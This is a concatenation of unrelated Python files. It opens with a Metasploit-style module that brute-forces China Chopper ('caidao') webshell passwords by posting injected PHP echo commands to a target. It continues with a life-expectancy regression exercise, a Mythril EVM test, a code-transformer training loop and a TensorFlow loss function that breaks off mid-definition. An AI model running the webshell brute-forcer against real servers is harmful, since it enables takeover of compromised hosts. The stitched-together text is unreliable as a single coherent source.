'type': 'single_scanner',
'options': {
'SCHEMA': {'type': 'string', 'description': 'http or https ', 'required': True, 'default': 'http'},
'TARGETURI': {'type': 'string', 'description': 'The base path such as /a.php ', 'required': True, 'default': '/caidao.php'},
'RPORT': {'type': 'port', 'description': 'rport', 'required': True, 'default': 80},
'PASS_FILE': {'type': 'string', 'description': 'Default is caidao_pass.txt . ',
'required': False, 'default': None},
},
}
def run(args):
module.LogHandler.setup(msg_prefix='{}:{} - '.format(args['rhost'], args['RPORT']))
if dependencies_missing:
logging.error('Module dependency (requests) is missing, cannot continue.')
logging.error('use (pip install requests) to install the dependency.')
return
##
logging.debug('Module path:{}'.format(__file__))
##
pass_file = args["PASS_FILE"]
# PASS_FILE defaults to None, so fall back to the bundled wordlist when it is unset or empty
if not pass_file:
pass_file = os.path.join(os.path.dirname(__file__),'caidao_pass.txt')
try:
with open(pass_file) as f:
passwords = f.readlines()
except FileNotFoundError as e:
logging.warning("Can't find the pass file: {}.".format(pass_file))
return
headers = {
"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
}
try:
for password in passwords:
password = password.rstrip('\r\n')  # strip the trailing newline without mangling the last line
mark = ''.join(random.sample(string.ascii_letters, 10))
data = {
password: 'echo "{}";'.format(mark)
}
r = requests.post('{}://{}:{}{}'.format(args['SCHEMA'], args['rhost'], args['RPORT'], args['TARGETURI']),
data=data, headers=headers, verify=False,timeout=4)
if mark in r.text:
module.log('{} - Success:{}'.format(args['rhost'], password), level='good')
module.report_correct_password('', password)
with open(os.path.basename(__file__)+'.success.log','a') as f :
f.write('{}://{}:{}{} {}\n'.format(args['SCHEMA'], args['rhost'], args['RPORT'], args['TARGETURI'],password))
f.flush()
return
else:
logging.error('Failed: {}'.format(password))
r.close()
except requests.exceptions.RequestException as e:
logging.error('{}'.format(e))
if __name__ == '__main__':
module.run(metadata, run)
|
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
from sklearn import linear_model
matplotlib.style.use('ggplot') # Look Pretty
def drawLine(model, X_test, y_test, title):
# This convenience method will take care of plotting your
# test observations, comparing them to the regression line,
# and displaying the R2 coefficient
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(X_test, y_test, c='g', marker='o')
ax.plot(X_test, model.predict(X_test), color='orange', linewidth=1, alpha=0.7)
print "Est 2014 " + title + " Life Expectancy: ", model.predict([[2014]])[0]
print "Est 2030 " + title + " Life Expectancy: ", model.predict([[2030]])[0]
print "Est 2045 " + title + " Life Expectancy: ", model.predict([[2045]])[0]
score = model.score(X_test, y_test)
title += " R2: " + str(score)
ax.set_title(title)
plt.show()
#
# TODO: Load up the data here into a variable called 'X'.
# As usual, do a .describe and a print of your dataset and
# compare it to the dataset loaded in a text file or in a
# spread sheet application
#
# .. your code here ..
X = pd.read_csv('Datasets/life_expectancy.csv', header=0, sep='\t')
#
# TODO: Create your linear regression model here and store it in a
# variable called 'model'. Don't actually train or do anything else
# with it yet:
#
# .. your code here ..
model = linear_model.LinearRegression()
#
# TODO: Slice out your data manually (e.g. don't use train_test_split,
# but actually do the Indexing yourself. Set X_train to be year values
# LESS than 1986, and y_train to be corresponding WhiteMale age values.
#
# INFO You might also want to read the note about slicing on the bottom
# of this document before proceeding.
#
# .. your code here ..
X_train = X[['Year']].loc[X['Year']<1986]
y_train = X[['WhiteMale']].loc[X['Year']<1986]
print(X_train)
print(y_train)
#
# TODO: Train your model then pass it into drawLine with your training
# set and labels. You can title it "WhiteMale". drawLine will output
# to the console a 2014 extrapolation / approximation for what it
# believes the WhiteMale's life expectancy in the U.S. will be...
# given the pre-1986 data you trained it with. It'll also produce a
# 2030 and 2045 extrapolation.
#
# .. your code here ..
model.fit(X_train,y_train)
#linear_model.LinearRegression(copy_X=True, fit_intercept=True, n_jobs=1, normalize=False)
drawLine(model, X_train,y_train, "WhiteMale")
#
# TODO: Print the actual 2014 WhiteMale life expectancy from your
# loaded dataset
#
# .. your code here ..
print(X.WhiteMale.loc[X['Year']==2014])
#
# TODO: Repeat the process, but instead of for WhiteMale, this time
# select BlackFemale. Create a slice for BlackFemales, fit your
# model, and then call drawLine. Lastly, print out the actual 2014
# BlackFemale life expectancy
#
# .. your code here ..
X_train = X[['Year']].loc[X['Year']<1986]
y_train = X[['BlackFemale']].loc[X['Year']<1986]
print(X_train)
print(y_train)
model.fit(X_train,y_train)
drawLine(model, X_train,y_train, "BlackFemale")
print(X.BlackFemale.loc[X['Year']==2014])
#
# TODO: Lastly, print out a correlation matrix for your entire
# dataset, and display a visualization of the correlation
# matrix, just as we described in the visualization section of
# the course
#
# .. your code here ..
print(X.corr())
#
# TODO: Graph the correlation matrix using imshow or matshow
#
plt.imshow(X.corr(), cmap=plt.cm.Blues, interpolation='nearest')
plt.colorbar()
tick_marks = [i for i in range(len(X.columns))]
plt.xticks(tick_marks, X.columns, rotation='vertical')
plt.yticks(tick_marks, X.columns)
plt.show()
#
# INFO + HINT On Fitting, Scoring, and Predicting:
#
# Here's a hint to help you complete the assignment without pulling
# your hair out! When you use .fit(), .score(), and .predict() on
# your model, SciKit-Learn expects your training data to be in
# spreadsheet (2D Array-Like) form. This means you can't simply
# pass in a 1D Array (slice) and get away with it.
#
# To properly prep your data, you have to pass in a 2D Numpy Array,
# or a dataframe. But what happens if you really only want to pass
# in a single feature?
#
# If you slice your dataframe using df[['ColumnName']] syntax, the
# result that comes back is actually a *dataframe*. Go ahead and do
# a type() on it to check it out. Since it's already a dataframe,
# you're good -- no further changes needed.
#
# But if you slice your dataframe using the df.ColumnName syntax,
# OR if you call df['ColumnName'], the result that comes back is
# actually a series (1D Array)! This will cause SKLearn to bug out.
# So if you are slicing using either of those two techniques, before
# sending your training or testing data to .fit / .score, do a
# my_column = my_column.reshape(-1,1). This will convert your 1D
# array of [n_samples], to a 2D array shaped like [n_samples, 1].
# A single feature, with many samples.
#
# If you did something like my_column = [my_column], that would produce
# an array in the shape of [1, n_samples], which is incorrect because
# SKLearn expects your data to be arranged as [n_samples, n_features].
# Keep in mind, all of the above only relates to your "X" or input
# data, and does not apply to your "y" or labels.
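#
# Quick illustration of the slicing note above (added sketch; 'WhiteMale' is one of the
# columns already used in this exercise):
#   X[['WhiteMale']]                       -> DataFrame, shape (n_samples, 1), fine for .fit()
#   X['WhiteMale'] or X.WhiteMale          -> Series, shape (n_samples,), needs reshaping
#   X['WhiteMale'].values.reshape(-1, 1)   -> 2D array, shape (n_samples, 1)
#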
|
from mythril.disassembler.disassembly import Disassembly
from mythril.laser.ethereum.state.environment import Environment
from mythril.laser.ethereum.state.account import Account
from mythril.laser.ethereum.state.machine_state import MachineState
from mythril.laser.ethereum.state.global_state import GlobalState
from mythril.laser.ethereum.instructions import Instruction
def test_codecopy_concrete():
# Arrange
active_account = Account("0x0", code=Disassembly("60606040"))
environment = Environment(active_account, None, None, None, None, None)
og_state = GlobalState(None, environment, None, MachineState(gas=10000000))
og_state.mstate.stack = [2, 2, 2]
instruction = Instruction("codecopy", dynamic_loader=None)
# Act
new_state = instruction.evaluate(og_state)[0]
# Assert
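# Added note: the code 0x60606040 has byte 0x60 (96) at offset 2 and 0x40 (64) at offset 3,
# so copying 2 bytes starting at code offset 2 should land them in memory[2] and memory[3].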
assert new_state.mstate.memory[2] == 96
assert new_state.mstate.memory[3] == 64
|
import random
import signal
import sys
from abc import abstractmethod
from itertools import islice
from statistics import mean
import torch
from sacred import Experiment
from torch import optim
from torch.utils.data import DataLoader
from tqdm import tqdm
from code_transformer.configuration.transformer_lm_encoder import TransformerLMEncoderConfig
from code_transformer.experiments.log import ExperimentLogger, TensorboardLogger
from code_transformer.modeling.constants import PAD_TOKEN, UNKNOWN_TOKEN, EOS_TOKEN, NUM_SUB_TOKENS
from code_transformer.modeling.modelmanager import ModelManager
from code_transformer.modeling.modelmanager.code_transformer import CodeTransformerModelManager, \
CodeTransformerLMModelManager
from code_transformer.preprocessing.datamanager.base import batch_filter_distances, batch_to_device, \
DataLoaderWrapper, BufferedDataManager
from code_transformer.preprocessing.datamanager.preprocessed import CTBufferedDataManager
from code_transformer.preprocessing.dataset.lm import CTLanguageModelingDataset, \
CTLanguageModelingDatasetNoPunctuation
from code_transformer.preprocessing.graph.binning import ExponentialBinning, EqualBinning
from code_transformer.preprocessing.graph.distances import DistanceBinning
from code_transformer.preprocessing.graph.transform import MaxDistanceMaskTransform, TokenDistancesTransform
from code_transformer.utils.metrics import top1_accuracy, topk_accuracy, precision, recall, f1_score, \
non_trivial_words_accuracy, micro_f1_score, rouge_2, rouge_l
from code_transformer.utils.timing import Timing
from code_transformer.env import MODELS_SAVE_PATH, LOGS_PATH, DATA_PATH_STAGE_2
ex = Experiment(base_dir='../../', interactive=False)
class ExperimentSetup:
def __init__(self):
self._init_config()
self._init_data_transforms()
self._init_data()
self._init_transfer_learning()
self._init_model()
self._init_optimizer()
@ex.capture
def _init_config(self, _config):
self.config = _config
@ex.capture(prefix="data_transforms")
def _init_data_transforms(self, max_distance_mask, relative_distances, distance_binning):
self.max_distance_mask = None if max_distance_mask is None else MaxDistanceMaskTransform(max_distance_mask)
self.relative_distances = [] if relative_distances is None else relative_distances
if distance_binning['type'] == 'exponential':
trans_func = ExponentialBinning(distance_binning['growth_factor'])
else:
trans_func = EqualBinning()
self.distance_binning = {
'n_fixed_bins': distance_binning['n_fixed_bins'],
'trans_func': trans_func
}
@ex.capture(prefix="data_setup")
def _init_data(self, language, num_predict, use_validation=False, mini_dataset=False,
use_no_punctuation=False, use_pointer_network=False, sort_by_length=False, shuffle=True,
chunk_size=None, filter_language=None, dataset_imbalance=None, num_sub_tokens=NUM_SUB_TOKENS):
self.data_manager = CTBufferedDataManager(DATA_PATH_STAGE_2, language, shuffle=shuffle,
infinite_loading=True,
mini_dataset=mini_dataset, size_load_buffer=10000,
sort_by_length=sort_by_length, chunk_size=chunk_size,
filter_language=filter_language, dataset_imbalance=dataset_imbalance)
self.word_vocab, self.token_type_vocab, self.node_type_vocab = self.data_manager.load_vocabularies()
token_distances = None
if TokenDistancesTransform.name in self.relative_distances:
num_bins = self.data_manager.load_config()['binning']['num_bins']
token_distances = TokenDistancesTransform(
DistanceBinning(num_bins, self.distance_binning['n_fixed_bins'], self.distance_binning['trans_func']))
self.num_predict = num_predict
self.use_pointer_network = use_pointer_network
self.use_separate_vocab = False # For language modeling we always only operate on the method body vocabulary
if use_no_punctuation:
self.dataset_train = CTLanguageModelingDatasetNoPunctuation(self.data_manager,
token_distances=token_distances,
max_distance_mask=self.max_distance_mask,
num_labels_per_sample=num_predict,
use_pointer_network=use_pointer_network,
num_sub_tokens=num_sub_tokens)
else:
self.dataset_train = CTLanguageModelingDataset(self.data_manager, token_distances=token_distances,
max_distance_mask=self.max_distance_mask,
num_labels_per_sample=num_predict,
use_pointer_network=use_pointer_network,
num_sub_tokens=num_sub_tokens)
self.use_validation = use_validation
if self.use_validation:
data_manager_validation = CTBufferedDataManager(DATA_PATH_STAGE_2, language, partition="valid",
shuffle=True, infinite_loading=True,
mini_dataset=mini_dataset, size_load_buffer=10000,
filter_language=filter_language,
dataset_imbalance=dataset_imbalance)
if use_no_punctuation:
self.dataset_validation = CTLanguageModelingDatasetNoPunctuation(data_manager_validation,
token_distances=token_distances,
max_distance_mask=self.max_distance_mask,
num_labels_per_sample=num_predict,
use_pointer_network=use_pointer_network,
num_sub_tokens=num_sub_tokens)
else:
self.dataset_validation = CTLanguageModelingDataset(data_manager_validation,
token_distances=token_distances,
max_distance_mask=self.max_distance_mask,
num_labels_per_sample=num_predict,
use_pointer_network=use_pointer_network,
num_sub_tokens=num_sub_tokens)
self.dataset_validation_creator = \
lambda infinite_loading: self._create_validation_dataset(DATA_PATH_STAGE_2,
language,
use_no_punctuation,
token_distances,
infinite_loading,
num_predict,
use_pointer_network,
filter_language,
dataset_imbalance,
num_sub_tokens)
def _create_validation_dataset(self, data_location, language, use_no_punctuation, token_distances,
infinite_loading, num_predict, use_pointer_network, filter_language,
dataset_imbalance, num_sub_tokens):
data_manager_validation = CTBufferedDataManager(data_location, language, partition="valid",
shuffle=True, infinite_loading=infinite_loading,
size_load_buffer=10000, filter_language=filter_language,
dataset_imbalance=dataset_imbalance)
if use_no_punctuation:
return CTLanguageModelingDatasetNoPunctuation(data_manager_validation,
token_distances=token_distances,
max_distance_mask=self.max_distance_mask,
num_labels_per_sample=num_predict,
use_pointer_network=use_pointer_network,
num_sub_tokens=num_sub_tokens)
else:
return CTLanguageModelingDataset(data_manager_validation,
token_distances=token_distances,
max_distance_mask=self.max_distance_mask,
num_labels_per_sample=num_predict,
use_pointer_network=use_pointer_network,
num_sub_tokens=num_sub_tokens)
@ex.capture(prefix="transfer_learning")
def _init_transfer_learning(self, use_pretrained_model=False, model_type=None, run_id=None,
snapshot_iteration=None, cpu=False, freeze_encoder_layers=None):
assert not use_pretrained_model or (
run_id is not None
and snapshot_iteration is not None
and model_type is not None), "model_type, run_id and snapshot_iteration have to be provided if " \
"use_pretrained_model is set"
self.use_pretrained_model = use_pretrained_model
if use_pretrained_model:
print(
f"Using Transfer Learning. Loading snapshot snapshot-{snapshot_iteration} from run {run_id} in collection "
f"{model_type} ")
if model_type == 'ct_code_summarization':
model_manager = CodeTransformerModelManager()
pretrained_model = model_manager.load_model(run_id, snapshot_iteration, gpu=not cpu)
self.pretrained_model = pretrained_model
elif model_type == 'ct_lm':
model_manager = CodeTransformerLMModelManager()
pretrained_model = model_manager.load_model(run_id, snapshot_iteration, gpu=not cpu)
self.pretrained_model = pretrained_model
else:
model_manager = ModelManager(MODELS_SAVE_PATH, model_type)
self.pretrained_model_params = model_manager.load_parameters(run_id, snapshot_iteration, gpu=not cpu)
encoder_config = model_manager.load_config(run_id)['model']['transformer_lm_encoder']
self.pretrained_transformer_encoder_config = TransformerLMEncoderConfig(**encoder_config)
if freeze_encoder_layers is not None:
self.freeze_encoder_layers = freeze_encoder_layers
def generate_transformer_lm_encoder_config(self, transformer_lm_encoder: dict) -> TransformerLMEncoderConfig:
config = TransformerLMEncoderConfig(**transformer_lm_encoder)
if self.use_pretrained_model:
loaded_config = self.pretrained_transformer_encoder_config
if not config == self.pretrained_transformer_encoder_config:
print(f"pretrained configuration differs from given configuration. Pretrained: "
f"{self.pretrained_transformer_encoder_config}, Given: {config}. Try merging...")
loaded_config.input_nonlinearity = config.input_nonlinearity
loaded_config.transformer['encoder_layer']['dropout'] = config.transformer['encoder_layer']['dropout']
loaded_config.transformer['encoder_layer']['activation'] \
= config.transformer['encoder_layer']['activation']
config = loaded_config
transformer_config = dict(config.transformer)
if hasattr(self, "word_vocab"):
config.vocab_size = len(self.word_vocab)
if hasattr(self, "token_type_vocab"):
if hasattr(self, "use_only_ast") and self.use_only_ast:
config.num_token_types = None
else:
config.num_token_types = len(self.token_type_vocab)
if hasattr(self, "node_type_vocab"):
config.num_node_types = len(self.node_type_vocab)
if hasattr(self, "relative_distances"):
encoder_layer_config = dict(transformer_config['encoder_layer'])
encoder_layer_config['num_relative_distances'] = len(self.relative_distances)
transformer_config['encoder_layer'] = encoder_layer_config
if hasattr(self, "num_sub_tokens"):
config.subtokens_per_token = self.num_sub_tokens
if hasattr(self, 'num_languages'):
config.num_languages = self.num_languages
config.transformer = transformer_config
return config
@abstractmethod
def _init_model(self, *args, **kwargs):
self.model_lm = None
self.with_cuda = True
self.model_manager = None
@ex.capture(prefix="optimizer")
def _init_optimizer(self, learning_rate, reg_scale, scheduler=None, scheduler_params=None, optimizer="Adam"):
if optimizer == 'Adam':
self.optimizer = optim.Adam(self.model_lm.parameters(), lr=learning_rate, weight_decay=reg_scale)
elif optimizer == 'Momentum':
self.optimizer = optim.SGD(self.model_lm.parameters(), lr=learning_rate, weight_decay=reg_scale,
momentum=0.95, nesterov=True)
self.scheduler = None
if scheduler == 'OneCycleLR':
self.scheduler = optim.lr_scheduler.OneCycleLR(self.optimizer, **scheduler_params)
elif scheduler == 'MultiStepLR':
self.scheduler = optim.lr_scheduler.MultiStepLR(self.optimizer, **scheduler_params)
def _init_metrics(self, metrics):
self.metrics = dict()
pad_id = self.word_vocab[PAD_TOKEN]
unk_id = self.word_vocab[UNKNOWN_TOKEN]
for metric in metrics:
if metric == 'top1_accuracy':
self.metrics[metric] = top1_accuracy
self.metrics[f"{metric}_no_unk"] = lambda logits, labels: top1_accuracy(logits, labels,
unk_id=unk_id, pad_id=pad_id)
elif metric == 'top5_accuracy':
self.metrics[metric] = lambda logits, labels: topk_accuracy(5, logits, labels)
self.metrics[f"{metric}_no_unk"] = lambda logits, labels: topk_accuracy(5, logits, labels,
unk_id=unk_id, pad_id=pad_id)
elif metric == 'precision':
self.metrics[metric] = lambda logits, labels: precision(logits, labels, pad_id=pad_id)
self.metrics[f"{metric}_no_unk"] = lambda logits, labels: precision(logits, labels, pad_id=pad_id,
unk_id=unk_id)
elif metric == 'recall':
self.metrics[metric] = lambda logits, labels: recall(logits, labels, pad_id=pad_id)
self.metrics[f"{metric}_no_unk"] = lambda logits, labels: recall(logits, labels, pad_id=pad_id,
unk_id=unk_id)
elif metric == 'f1_score':
self.metrics[metric] = lambda logits, labels: f1_score(logits, labels, pad_id=pad_id)
self.metrics[f"{metric}_no_unk"] = lambda logits, labels: f1_score(logits, labels, pad_id=pad_id,
unk_id=unk_id)
elif metric == 'non_trivial_accuracy':
self.metrics[metric] = lambda logits, labels: non_trivial_words_accuracy(logits, labels, pad_id)
self.metrics[f"{metric}_no_unk"] = lambda logits, labels: non_trivial_words_accuracy(logits, labels,
pad_id,
unk_id=unk_id)
elif metric == 'micro_f1_score':
self.metrics[metric] = lambda logits, labels: micro_f1_score(logits, labels, pad_id=pad_id,
unk_id=unk_id)
elif metric == 'rouge_2':
self.metrics[metric] = lambda logits, labels: rouge_2(logits, labels, pad_id=pad_id)
elif metric == 'rouge_l':
self.metrics[metric] = lambda logits, labels: rouge_l(logits, labels, pad_id=pad_id)
@ex.capture(prefix="training")
def train(self, batch_size, simulated_batch_size, random_seed, metrics,
validate_every=None,
persistent_snapshot_every=None, simulated_batch_size_valid=None, early_stopping_patience=10,
max_validation_samples=10000, accumulate_tokens_batch=False):
if self.with_cuda:
self.model_lm = self.model_lm.cuda()
self.device = "cuda"
else:
self.device = "cpu"
run_id = self.model_manager.generate_run_name()
self.logger = ExperimentLogger("experiment",
TensorboardLogger(f"{LOGS_PATH}/{self.model_manager.model_type}/{run_id}"))
self.logger.info(f"===============================================")
self.logger.info(f"Starting run {run_id}")
self.logger.info(f"===============================================")
self.model_manager.save_config(run_id, self.config)
early_stopping = EarlyStopping(self.model_manager, run_id, early_stopping_patience)
num_params = sum([len(params.view(-1)) for params in self.model_lm.parameters()])
self.logger.info(f"Start training model with {num_params} parameters")
self.logger.info(f"Model setup: {self.model_lm}")
self._init_metrics(metrics)
torch.manual_seed(random_seed)
random.seed(random_seed)
# Simulated batches
simulated_batch_size = batch_size if simulated_batch_size is None else simulated_batch_size
assert simulated_batch_size % batch_size == 0, "simulated_batch_size must be a multiple of batch_size"
num_simulated_batches = simulated_batch_size // batch_size
# Main train loop
train_step = 0
dataloader = DataLoader(self.dataset_train, batch_size=batch_size, collate_fn=self.dataset_train.collate_fn)
if self.use_validation:
if simulated_batch_size_valid is None:
simulated_batch_size_valid = simulated_batch_size
num_simulated_batches_valid = simulated_batch_size_valid // batch_size
dataloader_validation = iter(DataLoader(self.dataset_validation, batch_size=batch_size,
collate_fn=self.dataset_validation.collate_fn))
n_tokens_accumulate_batch = None
if accumulate_tokens_batch:
n_tokens_accumulate_batch = 0
epoch = 1
progress_bar = tqdm(total=int(self.data_manager.approximate_total_samples() / batch_size))
progress_bar.set_description(f"Epoch {epoch}")
# Ensure graceful shutdown when training is interrupted
signal.signal(signal.SIGINT, self._handle_shutdown)
with Timing() as t:
for it, batch in enumerate(dataloader):
self.logger.log_time(t.measure() / batch_size, "dataloader_seconds/sample",
train_step * simulated_batch_size + (it % num_simulated_batches) * batch_size)
# Calculate gradients
batch = batch_filter_distances(batch, self.relative_distances)
model_out = self._train_step(batch, num_simulated_batches)
self.logger.log_time(t.measure() / batch_size, "model_seconds/sample",
train_step * simulated_batch_size + (it % num_simulated_batches) * batch_size)
# Log actual predicted words and labels
self.logger.log_text("input/train",
str([[self.word_vocab.reverse_lookup(st.item()) for st in token
if st.item() != self.word_vocab[PAD_TOKEN]
and st.item() != self.word_vocab[EOS_TOKEN]]
for token in batch.tokens[0]]))
self.logger.log_text("predicted words/train", str(self._decode_predicted_words(model_out, batch)))
self.logger.log_text("labels/train", str(self._decode_labels(batch)))
# Calculate metrics
evaluation = self._evaluate_predictions(model_out.logits, batch.labels, loss=model_out.loss)
self.logger.log_sub_batch_metrics(evaluation)
if accumulate_tokens_batch:
n_tokens_accumulate_batch += batch.sequence_lengths.sum().item()
# Gradient accumulation: only update gradients every num_simulated_batches step
                if (not accumulate_tokens_batch and it % num_simulated_batches == (num_simulated_batches - 1)) \
                        or (accumulate_tokens_batch and n_tokens_accumulate_batch > simulated_batch_size):
if accumulate_tokens_batch:
n_tokens_accumulate_batch = 0
train_step += 1
total_norm = 0
for p in self.model_lm.parameters():
if p.grad is not None:
param_norm = p.grad.data.norm(2)
total_norm += param_norm.item() ** 2
total_norm = total_norm ** (1. / 2)
self.logger.log_metrics({'gradient_norm': total_norm}, train_step * simulated_batch_size)
self.optimizer.step()
self.optimizer.zero_grad()
if self.scheduler:
if not hasattr(self.scheduler,
"total_steps") or train_step < self.scheduler.total_steps - 1:
self.scheduler.step()
self.logger.log_metrics({'lr': self.scheduler.get_lr()[0]},
train_step * simulated_batch_size)
# Send train metrics to observers
self.logger.flush_batch_metrics(train_step * simulated_batch_size)
# Evaluate on validation set
if self.use_validation and validate_every and train_step % validate_every == 0:
t.measure()
self.model_lm.eval()
with torch.no_grad():
for validation_batch in islice(dataloader_validation, num_simulated_batches_valid):
validation_batch = batch_filter_distances(validation_batch, self.relative_distances)
validation_batch = batch_to_device(validation_batch, self.device)
output = self.model_lm.forward_batch(validation_batch).cpu()
validation_batch = batch_to_device(validation_batch, "cpu")
evaluation = self._evaluate_predictions(output.logits, validation_batch.labels,
loss=output.loss, partition='valid')
self.logger.log_sub_batch_metrics(evaluation)
self.logger.log_text("predicted words/validation",
str(self._decode_predicted_words(output, validation_batch)))
self.logger.log_text("labels/validation",
str(self._decode_labels(validation_batch)))
self.model_lm.train()
self.logger.flush_batch_metrics(step=train_step * simulated_batch_size)
self.logger.log_time(t.measure() / simulated_batch_size_valid, "valid_seconds/sample",
train_step * simulated_batch_size)
if persistent_snapshot_every and (it + 1) % persistent_snapshot_every == 0:
snapshot_iteration = it + 1
self.logger.info(f"Storing model params into snapshot-{snapshot_iteration}")
self.model_manager.save_snapshot(run_id, self.model_lm.state_dict(), snapshot_iteration)
dataset = self.dataset_validation_creator(False)
score = self.evaluate(islice(dataset.to_dataloader(), int(max_validation_samples / batch_size)),
train_step * simulated_batch_size, 'valid_full')
if f"micro_f1_score/valid_full" in self.logger.sub_batch_metrics:
score_name = 'micro-F1'
else:
score_name = 'F1'
self.logger.info(f"Full evaluation yielded {score} {score_name}")
if not early_stopping.evaluate(score, snapshot_iteration):
self.logger.info(f"Last {early_stopping_patience} evaluations did not improve performance. "
f"Stopping run")
break
progress_bar.update()
if progress_bar.n >= progress_bar.total:
progress_bar = tqdm(total=int(self.data_manager.approximate_total_samples() / batch_size))
epoch += 1
progress_bar.set_description(f"Epoch {epoch}")
t.measure()
self._handle_shutdown()
def _train_step(self, batch, num_simulated_batches):
batch = batch_to_device(batch, self.device)
output_gpu = self.model_lm.forward_batch(batch)
# Gradient accumulation: every batch contributes only a part of the total gradient
(output_gpu.loss / num_simulated_batches).backward()
output_cpu = output_gpu.cpu()
del output_gpu
del batch
return output_cpu
def _evaluate_predictions(self, logits, labels, loss=None, partition='train'):
evaluation = dict()
for metric_name, metric_fn in self.metrics.items():
evaluation[f"{metric_name}/{partition}"] = metric_fn(logits, labels)
        if loss is not None:
evaluation[f"loss/{partition}"] = loss.item()
return evaluation
def evaluate(self, dataset, step, partition='valid'):
# Evaluate on validation set
self.model_lm.eval()
predictions = []
labels = []
with torch.no_grad():
for validation_batch in dataset:
validation_batch = batch_filter_distances(validation_batch, self.relative_distances)
validation_batch = batch_to_device(validation_batch, self.device)
output = self.model_lm.forward_batch(validation_batch).cpu()
validation_batch = batch_to_device(validation_batch, "cpu")
predictions.extend(output.logits.argmax(-1))
labels.extend(validation_batch.labels)
evaluation = self._evaluate_predictions(output.logits, validation_batch.labels,
loss=output.loss, partition=partition)
self.logger.log_sub_batch_metrics(evaluation)
self.logger.log_text("predicted words/validation",
str(self._decode_predicted_words(output, validation_batch)))
self.logger.log_text("labels/validation", str(self._decode_labels(validation_batch)))
self.model_lm.train()
if f"micro_f1_score/{partition}" in self.logger.sub_batch_metrics:
score = mean(self.logger.sub_batch_metrics[f"micro_f1_score/{partition}"])
else:
score = mean(self.logger.sub_batch_metrics[f"f1_score/{partition}"])
self.logger.flush_batch_metrics(step=step)
return score
def _decode_predicted_words(self, model_out, batch):
method_name_vocab = self.method_name_vocab if self.use_separate_vocab else self.word_vocab
if hasattr(self, 'use_pointer_network') and self.use_pointer_network:
extended_vocab_reverse = {idx: word for word, idx in batch.extended_vocabulary[0].items()}
predicted_sub_tokens = ((predicted_sub_token.argmax().item(), predicted_sub_token.max().item()) for
predicted_sub_token in model_out.logits[0][0])
return [
(extended_vocab_reverse[st] if st in extended_vocab_reverse else method_name_vocab.reverse_lookup(st),
f"{value:0.2f}") for st, value in predicted_sub_tokens]
else:
return [(method_name_vocab.reverse_lookup(predicted_sub_token.argmax().item()),
f"{predicted_sub_token.max().item():0.2f}") for
predicted_sub_token in model_out.logits[0][0]]
def _decode_labels(self, batch):
method_name_vocab = self.method_name_vocab if self.use_separate_vocab else self.word_vocab
if hasattr(self, 'use_pointer_network') and self.use_pointer_network:
extended_vocab_reverse = {idx: word for word, idx in batch.extended_vocabulary[0].items()}
label_tokens = (sub_token_label.item() for sub_token_label in batch.labels[0][0])
return [extended_vocab_reverse[lt] if lt in extended_vocab_reverse else method_name_vocab.reverse_lookup(lt)
for lt in label_tokens]
else:
return [method_name_vocab.reverse_lookup(sub_token_label.item()) for sub_token_label in batch.labels[0][0]]
def get_dataloader(self, split: str, batch_size: int):
assert split == 'train' or split == 'validation'
if split == 'train':
ds = self.dataset_train
elif split == 'validation':
ds = self.dataset_validation
dl = DataLoader(ds, batch_size=batch_size, num_workers=0,
collate_fn=ds.collate_fn)
dl = DataLoaderWrapper(dl)
return BufferedDataManager(dl)
def _handle_shutdown(self, sig=None, frame=None):
self.dataset_train.data_manager.shutdown()
self.dataset_validation.data_manager.shutdown()
sys.exit(0)
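def _gradient_accumulation_sketch():
    """Illustrative sketch, not part of the original trainer: shows why _train_step divides the loss
    by num_simulated_batches. Accumulating the scaled gradients over num_simulated_batches mini-batches
    and stepping once approximates a single step on the larger simulated batch. All names below are
    local placeholders, not attributes of the experiment class."""
    import torch
    model = torch.nn.Linear(4, 1)
    optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
    num_simulated_batches = 4  # i.e. simulated_batch_size // batch_size
    data = [(torch.randn(2, 4), torch.randn(2, 1)) for _ in range(8)]
    for it, (x, y) in enumerate(data):
        loss = torch.nn.functional.mse_loss(model(x), y)
        (loss / num_simulated_batches).backward()  # each mini-batch contributes a fraction of the gradient
        if it % num_simulated_batches == num_simulated_batches - 1:
            optimizer.step()       # update once per simulated batch
            optimizer.zero_grad()  # clear the accumulated gradients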
class EarlyStopping:
def __init__(self, model_manager: ModelManager, run_id, patience):
self.model_manager = model_manager
self.run_id = run_id
self.patience = patience
self.evaluation_results = dict()
self._counter = 0
self._best = 0
def evaluate(self, score, snapshot_iteration):
self.evaluation_results[snapshot_iteration] = score
sorted_results = sorted(self.evaluation_results.items(), key=lambda x: x[1], reverse=True)
print(f"Current best performing snapshots: {sorted_results}")
snapshots_to_keep = sorted_results[:self.patience]
snapshots_to_keep = [x[0] for x in snapshots_to_keep]
stored_snapshots = self.model_manager.get_available_snapshots(self.run_id)
for stored_snapshot in stored_snapshots:
if stored_snapshot not in snapshots_to_keep:
self.model_manager.delete_snapshot(self.run_id, stored_snapshot)
if score > self._best:
self._best = score
self._counter = 0
else:
self._counter += 1
print(f"Counter: {self._counter}, Best: {self._best}")
if self._counter > self.patience:
return False
else:
return True
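def _early_stopping_usage_sketch():
    """Usage sketch, illustrative only and not part of the original file: evaluate() returns False once
    more than `patience` consecutive scores fail to beat the best score seen so far, and it prunes stored
    snapshots down to the `patience` best-scoring ones. The stub manager below is a minimal stand-in for
    ModelManager, assumed only for demonstration."""
    class _StubManager:
        def get_available_snapshots(self, run_id):
            return []
        def delete_snapshot(self, run_id, snapshot_iteration):
            pass
    early_stopping = EarlyStopping(_StubManager(), run_id="example-run", patience=3)
    for snapshot_iteration, score in enumerate([0.30, 0.35, 0.34, 0.33, 0.32, 0.31], start=1):
        if not early_stopping.evaluate(score, snapshot_iteration):
            break  # no improvement for more than `patience` evaluations -> stop training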
|
import tensorflow as tf
import cfg
def quad_loss(y_true, y_pred):
# loss for inside_score
logits = y_pred[:, :, :, :1]
labels = y_true[:, :, :, :1]
# balance positive and negative samples in an image
beta = 1 - tf.reduce_mean(labels)
# first apply sigmoid activation
predicts = tf.nn.sigmoid(logits)
    # add epsilon inside the log for numerical stability
inside_score_loss = tf.reduce_mean(
-1 * (beta * labels * tf.log(predicts + cfg.epsilon) +
(1 - beta) * (1 - labels) * tf.log(1 - predicts + cfg.epsilon)))
inside_score_loss *= cfg.lambda_inside_score_loss
# loss for side_vertex_code
vertex_logits = y_pred[:, :, :, 1:3]
vertex_labels = y_true[:, :, :, 1:3]
